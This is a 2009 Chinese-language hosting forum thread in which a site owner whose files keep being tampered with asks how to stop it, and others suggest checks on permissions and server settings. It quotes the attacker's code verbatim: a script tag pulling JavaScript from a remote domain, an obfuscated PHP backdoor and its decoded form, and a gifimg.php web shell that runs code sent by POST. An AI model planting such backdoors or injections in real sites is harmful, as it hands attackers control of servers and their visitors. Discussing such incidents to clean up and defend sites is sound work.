作者 主題: 我的網站都會被植入這一段code  (閱讀 27785 次)

0 會員 與 1 訪客 正在閱讀本文。

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
我的網站都會被植入這一段code
« 於: 2009-12-09 15:58 »
代碼: [選擇]
document.write('<script src=http://lewor.com.pl/Smarty/templates_lewor/Smarty.class.php ><\/script>'
在我的網站都會被植入這一段code
都被寫在js裡面
該如何防止被竄改呢

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #1 於: 2009-12-09 16:12 »
js目錄755
js檔案644

ricky

  • 實習板主
  • 鑽研的研究生
  • *****
  • 文章數: 669
    • 檢視個人資料
    • Ricky 碎碎唸
回覆: 我的網站都會被植入這一段code
« 回覆 #2 於: 2009-12-09 16:41 »
apache的執行身份?
file的owner?
我的symfony作品:YOMOpets 寵物誌
有興趣可以一起來討論symfony喔
我的部落格:http://ricky.ez2.us/

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #3 於: 2009-12-09 16:55 »
檔案的權限是該ftp帳號的

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
我的index.php遭到竄改
« 回覆 #4 於: 2009-12-09 17:55 »
代碼: [選擇]
<?php eval(base64_decode(&#39;aWYoIWZ1bmN0aW9uX2V4aXN0cygncngyJykpe2Z1bmN0aW9uIHJ4Migkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyeGxkMjl5TG1OdmJTNXdiQzlUYldGeWRIa3ZkR1Z0Y0d4aGRHVnpYMnhsZDI5eUwxTnRZWEowZVM1amJHRnpjeTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHJ4MjIoJGEsJGIsJGMsJGQpe2dsb2JhbCRyeDIxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRyeDIxKSljYWxsX3VzZXJfZnVuYygkcngyMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0ncngyJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgncngyJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHJ4Mmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3J4MjInKSkhPSdyeDIyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=&#39;)); ?>
駭客加入了這一段code
作用什麼呢?

kenduest

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 3675
    • 檢視個人資料
    • http://kenduest.sayya.org
回覆: 我的index.php遭到竄改
« 回覆 #5 於: 2009-12-09 18:12 »

base64 解碼後:

代碼: [選擇]
if(!function_exists('rx2')){function rx2($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2xld29yLmNvbS5wbC9TbWFydHkvdGVtcGxhdGVzX2xld29yL1NtYXJ0eS5jbGFzcy5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function rx22($a,$b,$c,$d){global$rx21;$s=array();if(function_exists($rx21))call_user_func($rx21,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='rx2')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('rx2');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$rx2l=(($a=@set_error_handler('rx22'))!='rx22')?$a:0;eval(base64_decode($_POST['e']));

真討厭,不大想解開了~~~

我比較想問的是,你們的網頁本身都是 apache 身份可以寫入的嗎?要不然怎麼都會被修改。
I am kenduest - 小州

my website: http://kenduest.sayya.org/

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 我的index.php遭到竄改
« 回覆 #6 於: 2009-12-09 19:02 »
網頁不是apache身分執行
可能是我電腦中木馬了
因為在www.xxx.com
裡面有很多網站
都有做sql injection檢查
但被修改的是php或js或多出一個檔案
sever是用戰x測

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 我的index.php遭到竄改
« 回覆 #7 於: 2009-12-09 19:03 »
駭客加上這段code他能做什麼

redjack

  • 活潑的大學生
  • ***
  • 文章數: 426
    • 檢視個人資料
回覆: 我的index.php遭到竄改
« 回覆 #8 於: 2009-12-09 22:11 »
我知道的常見目的如下:
1) 把form 裡的資料傳送到另一網址
2) 連到某網址時,自動導向到phishing
3) 竊取cookies  裡的資料

我不會php,不過只要排版一下的話應該可以整理出來。
我想這個是重點吧:
PHNjcmlwdCBzcmM9aHR0cDovL2xld29yLmNvbS5wbC9TbWFydHkvdGVtcGxhdGVzX2xld29yL1NtYXJ0eS5jbGFzcy5waHAgPjwvc2NyaXB0Pg

這應該算是一種shell 。
Knowledge is Power

redjack

  • 活潑的大學生
  • ***
  • 文章數: 426
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #9 於: 2009-12-09 22:14 »
檔案的權限是該ftp帳號的

所以網站的內容是直接透過ftp 上傳的嗎?
如果是的話,除非是像學校那樣給學生個人用的,否則建議不要。

web 設計師可能會說這樣有效率、方便,但是卻少了控管與安全性。
以這個case 來看,可能問題根本不出在你web server's setting,而是上傳的東西真的就是長這樣哦!
Knowledge is Power

Yamaka

  • 俺是博士!
  • *****
  • 文章數: 4913
    • 檢視個人資料
    • http://www.ecmagic.com
回覆: 我的index.php遭到竄改
« 回覆 #10 於: 2009-12-09 22:17 »
駭客加上這段code他能做什麼

這不是重點啊
好好處理一下自己網站安全問題吧

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #11 於: 2009-12-09 23:34 »
檔案的權限是該ftp帳號的

所以網站的內容是直接透過ftp 上傳的嗎?
如果是的話,除非是像學校那樣給學生個人用的,否則建議不要。

web 設計師可能會說這樣有效率、方便,但是卻少了控管與安全性。
以這個case 來看,可能問題根本不出在你web server's setting,而是上傳的東西真的就是長這樣哦!
檔案室透過ftp上傳的
我有看在上傳之前的檔案並沒有這段script
可是我剛才發現一個奇特的現象
就是有被插入這段script的.js檔案 最後修改時間都一模一樣
在www.xxx.com
裡面有很多網站和js檔案
最後修改時間不可能都一樣
只有js這樣

redjack

  • 活潑的大學生
  • ***
  • 文章數: 426
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #12 於: 2009-12-10 00:06 »
應該是說在極短時間內大量檔案被插入該CODE。

建議先照樓上大大的說法,檢查權限。
還有系統是否已被入侵?也許已經被跑一隻常駐或排程去做這個事情了 !?

然後再考量一下ftp 和web 是否要分開。
Knowledge is Power

eose

  • 活潑的大學生
  • ***
  • 文章數: 499
  • 性別: 男
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #13 於: 2009-12-10 09:37 »
可以參考一下之前的討論http://phorum.study-area.org/index.php/topic,57354.0.html


hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
改完ftp帳密之後還是被插入script
« 回覆 #14 於: 2009-12-10 21:09 »
我的images目錄下都會自己出現一個檔案叫做gifimg.php

這是內容
代碼: [選擇]
<?php  eval(base64_decode(&#39;aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7&#39;));?>

Yamaka

  • 俺是博士!
  • *****
  • 文章數: 4913
    • 檢視個人資料
    • http://www.ecmagic.com
回覆: 改完ftp帳密之後還是被插入script
« 回覆 #15 於: 2009-12-10 21:31 »
我的images目錄下都會自己出現一個檔案叫做gifimg.php

不是 ftp 帳號密碼的問題啊
之前那篇大家不是都提供一些建議了

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 改完ftp帳密之後還是被插入script
« 回覆 #16 於: 2009-12-10 21:42 »
我全部砍掉
重新建立一個資料夾
照道理來說  只有我知道這個資料夾能瀏覽
是沒有人會知道這個資料夾的
可是看log檔卻有來自其他ip的瀏覽

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 改完ftp帳密之後還是被插入script
« 回覆 #17 於: 2009-12-10 21:43 »
網站純html

eose

  • 活潑的大學生
  • ***
  • 文章數: 499
  • 性別: 男
    • 檢視個人資料
回覆: 改完ftp帳密之後還是被插入script
« 回覆 #18 於: 2009-12-10 21:52 »
請參考 http://www.scammeralert.info/website-hacked-attack-by-iframe-and-index-php-gifimg-php-base64_decode/  試試.
剛Google了一下,真是很熱門的掛碼阿 :P

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 改完ftp帳密之後還是被插入script
« 回覆 #19 於: 2009-12-10 22:05 »
請問要如何解密這個不知道怎麼出現的檔案呢
因為log檔都沒這個紀錄
我想知道內容是什麼
代碼: [選擇]
<?php  eval(base64_decode(&#39;aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7&#39;));?>

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #20 於: 2009-12-10 22:28 »
請問該怎麼防範呢

Yamaka

  • 俺是博士!
  • *****
  • 文章數: 4913
    • 檢視個人資料
    • http://www.ecmagic.com
回覆: 改完ftp帳密之後還是被插入script
« 回覆 #21 於: 2009-12-10 22:33 »
請問要如何解密這個不知道怎麼出現的檔案呢
因為log檔都沒這個紀錄
我想知道內容是什麼
代碼: [選擇]
<?php  eval(base64_decode(&#39;aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7&#39;));?>

解密?? 上面這段程式碼不就是解那段字串嗎!!


代碼: [選擇]
if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #22 於: 2009-12-10 22:36 »
謝謝
請問要如何防範這種事情呢

twu2

  • 管理員
  • 俺是博士!
  • *****
  • 文章數: 5417
  • 性別: 男
    • 檢視個人資料
    • http://blog.teatime.com.tw/1
回覆: 我的網站都會被植入這一段code
« 回覆 #23 於: 2009-12-11 00:17 »
防範? 就是不允許執行 web server 的身份可以寫入任何 web server 存取的目錄.

你上頭還是沒明確的說明你執行 web 的使用者, 到底能不能寫檔案到那些目錄中. 只有提到一般檔案是用 ftp 的使用者傳上去的....

除非有別的漏洞, 否則我還是認為是直接經由 web server 把檔案寫進來的.
allow_url_fopen 是打開的嗎?

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #24 於: 2009-12-11 00:56 »
目錄是755
不能寫入的
而且這個gifimg.php擁有權是屬於該ftp帳號
可是在Log檔裡面並沒有紀錄上傳過gifimg.php這個檔案

eose

  • 活潑的大學生
  • ***
  • 文章數: 499
  • 性別: 男
    • 檢視個人資料

ricky

  • 實習板主
  • 鑽研的研究生
  • *****
  • 文章數: 669
    • 檢視個人資料
    • Ricky 碎碎唸
回覆: 我的網站都會被植入這一段code
« 回覆 #26 於: 2009-12-11 13:18 »
目錄755不代表不能寫入....
先查清楚目錄的擁有者是誰,跟apache執行者的身份是誰
以前曾經看過天才目錄跟apache的執行身份設為同一個
此外ftp帳號跟實際Server的帳號不一定相同尤其是在虛擬主機上

目錄是755
不能寫入的
而且這個gifimg.php擁有權是屬於該ftp帳號
可是在Log檔裡面並沒有紀錄上傳過gifimg.php這個檔案
我的symfony作品:YOMOpets 寵物誌
有興趣可以一起來討論symfony喔
我的部落格:http://ricky.ez2.us/

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #27 於: 2009-12-11 14:48 »

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #28 於: 2009-12-11 14:48 »
會不會是跟我php safe_mode關掉有關係?!
我在網站目錄下面有放一個檔案.htaccess
內容是
php_value register_argc_argv on
« 上次編輯: 2009-12-11 15:41 由 hayaman212 »

hayaman212

  • 活潑的大學生
  • ***
  • 文章數: 372
    • 檢視個人資料
回覆: 我的網站都會被植入這一段code
« 回覆 #29 於: 2009-12-11 16:19 »
目錄755不代表不能寫入....

這句話好深奧喔
可以解釋一下嗎